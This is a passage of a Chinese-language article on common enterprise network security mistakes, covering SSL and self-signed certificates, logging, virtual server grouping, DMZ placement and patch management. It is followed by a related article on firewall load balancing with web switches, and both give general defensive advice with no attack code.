我们都知道，当用户需要在网站上输入敏感信息时（比如用户名，密码，信用卡卡号等），网站都会使用SSL 技术对信息进行加密。但是很多企业在这个问题上犯了错。我曾经遇见过很多次，企业将敏感信息和非敏感信息混合在一个网页中，当用户访问该页面时，会收到一条提示，询问用户是否同时查看安全内容和非安全的内容。大部分用户在面对这个提示时都是选择同时显示安全和非安全的内容，这就为网络安全带来了隐患。

一个不太明显但是更常见的错误是，企业很少加密自己网站上的一些关键页面。在我看来，任何涉及安全信息，安全设备以及联系人方式的信息都应该经过SSL 加密。这并不是因为这些内容都属于敏感信息，而是通过这些加密页面让用户确信自己所访问的是官方网站，而不是似是而非的网络钓鱼网站。

6: 使用自签名证书

由于一些企业完全忽视了SSL加密的重要性，因此微软开始在它的一些产品中加入了自签名的证书。这样用户在浏览网页时，就算企业的网站没有要求获得证书情况下，也可以使用SSL加密。

虽然自签名证书要比没有证书强，但它并不能作为一个来自受信的证书颁发机构所颁发的证书的替代品。自签名证书的主要作用其实只是用来激活软件的安全功能，直到管理员采取了相应的安全措施。虽然自签名证书可以实现SSL加密，但是用户会收到浏览器的警告信息，提示用户系统并不信任此类证书。另外，一些基于SSL的web服务（比如ActiveSync），由于信任关系，并不完全兼容自签名证书。

7: 过多的安全记录

虽然记录各种网络事件很重要，但是避免记录内容过于冗长也是很重要的。太长的日志会让管理员很难从中发现重要的安全事件。因此，与其将所有系统事件都记录下来，还不如将重点放在那些真正重要的事件上。

8: 随机分组虚拟服务器

虚拟服务器一般会根据其性能在主机上进行分组。比如在一台服务器上搭建了一个对性能要求较高的虚拟服务器应用后，与之搭配几个对系统性能要求较低的虚拟服务器，可以实现资源的合理化应用。从资源利用的角度上说，这么做非常正确，但是从安全性的角度看，就不见得了。

从安全的角度，我建议在一台独立的服务器上放置针对互联网应用的虚拟服务器。换句话说，如果你需要搭建三个针对互联网用户的虚拟服务器，你可以考虑将这三个 虚拟服务器分为一组，放置在同一台主机上，但是不要将架构类服务器（如域控制器）放在同一台主机上。

之所以这样建议，是针对虚拟服务器上的溢出攻击。所谓溢出攻击，是指黑客从一个虚拟服务器中溢出，进而控制主机的攻击。虽然就我所知，目前现实生活中还没有真正出现过此类攻击，但是我肯定这是迟早的事。一旦那一天到来，同一台主机上如果还安装了其它重要的虚拟服务器，那么对整个企业网络来说，将是一个灾难，对于网络管理员来说，解除威胁也将变得更困难。

9: 将成员服务器置于 DMZ

能避免的话，就尽量不要将任何成员服务器置于DMZ中。否则，一旦被入侵，这台成员服务器将可能泄露出很多有关活动目录的信息。

10: 升级补丁需要用户自己安装

本文所介绍的最后一个常见的网络安全错误是安全补丁的安装完全依赖用户人工操作。最近我见到很多公司网络中的电脑都依赖于Windows的自动更新服务进行自动打补丁。不幸的是，这类设计需要用户自己点击鼠标来进行补丁安装确认，而很多用户都知道，安装完补丁后系统会重新启动。为了避免这种麻烦，很多用户选择了停止自动更新。因此，与其将安装补丁的权利交给用户，不如通过某种补丁管理解决方案，自动将系统补丁分发到每台电脑上，绕过用户的任何操作。

相关文章

• 企业网络安全早防范

尽管防火墙在防止网络入侵方面具有很高的效率，并已成为提交安全Web站点和服务的关键因素，但是，所有这些安全性都是以很高代价取得的。简言之，防火墙会限制性能和可伸缩性。由于防火墙是会造成单故障点的在线设备，因此它会降低网络的可用性。将防火墙技术与新出现的Web交换技术相结合可以使防火墙的性能、可用性和可伸缩性得到极大的改善。

最常用的防火墙由安装在一台服务器上的软件构成。这台服务器上安装了两块网卡，并被插入到数据路径上。其中的一块网卡连接到网络的公共端，公共端通常为与Internet相连的路由器（即所谓防火墙的“不洁”端）。另一块网卡与必须保护的资源相连（即所谓防火墙的“清洁”端）。

防火墙安装在数据路径上，因此限制了网络的性能和可伸缩性，原因是所有通过不洁端和清洁端的数据流都必须流过防火墙。防火墙使用过滤技术和其它由网络管理人员预先设定的策略，对每个数据包进行检查。

问题是最适于防火墙的处理结构并不适于检查高容量的数据包。扩展防火墙的性能十分困难，因为它通常涉及到成本的高昂升级：使用更高性能的配置及目前功能最强大处理器的服务器。

新出现的Web交换技术被人们普遍认为是扩展防火墙容量、提高防火墙设备总体可用性的解决方案。在实现防火墙负载平衡时，需要使用两台Web 交换机：一台安装在防火墙的清洁端，另一台安装在不洁端。每台Web交换机都将输入的IP流通过防火墙发向另一端的对应Web交换机。这样就实现了在几个防火墙上的负载平衡，因此，使防火墙可以并行运行，扩展了防火墙的性能，并且消除了防火墙成为单故障点的可能。

与传统的包交换机不同，Web交换机具有保持以太网和千兆以太网速率传输的不同TCP会话的能力。由于防火墙是一种状态性（stateful）的设备，因此，所有与建立会话相关的数据包都要流过相同的防火墙。Web交换机智能地保持流经防火墙的数据流的状态信息，因而保证了所有在特定IP源／目的地址对之间传输的数据流都流过同一个防火墙。反过来，这也保证了防火墙建立的会话持续性。

防火墙负载平衡技术也可以被用来减少防火墙需要完成的数据流过滤功能的工作量，这正是实施“非军事区”（DMZ）技术的主要优点。在DMZ中保存象Internet这类Web服务器要求公共访问的资源。Web交换机需要具有数据流过滤功能来确定哪些数据包应当被传送到DMZ，哪些应当穿过防火墙。从防火墙上去除掉过滤功能大大提高了防火墙性能，加快了用户数据流的速度。

Web交换机被配置为允许或拒绝对DMZ服务器访问的过滤器，以这种方式实现了两级水平的安全性：一级利用配置在Web交换机上的过滤器对访问进行限制，另一级通过由防火墙进行的状态检查限制访问。

为保持防火墙的高可用性，Web交换机利用连续地向防火墙另一端的对应Web交换机上的每个端口发送强制回应命令（ping）来监控防火墙的“健康”情况。如果防火墙或Web交换机端口出现故障，数据流就被分配到其余的“健康”Web交换机端口和相关的防火墙上。

防火墙负载平衡利用新型Web交换技术解决了由防火墙引起的许多性能问题和可伸缩性问题。这项技术使防火墙可以并行地运行，在不用进行重大升级的条件下，大大提高了效率，扩展了性能，并消除了防火墙成为单故障点的可能。

相关文章

• No Related Post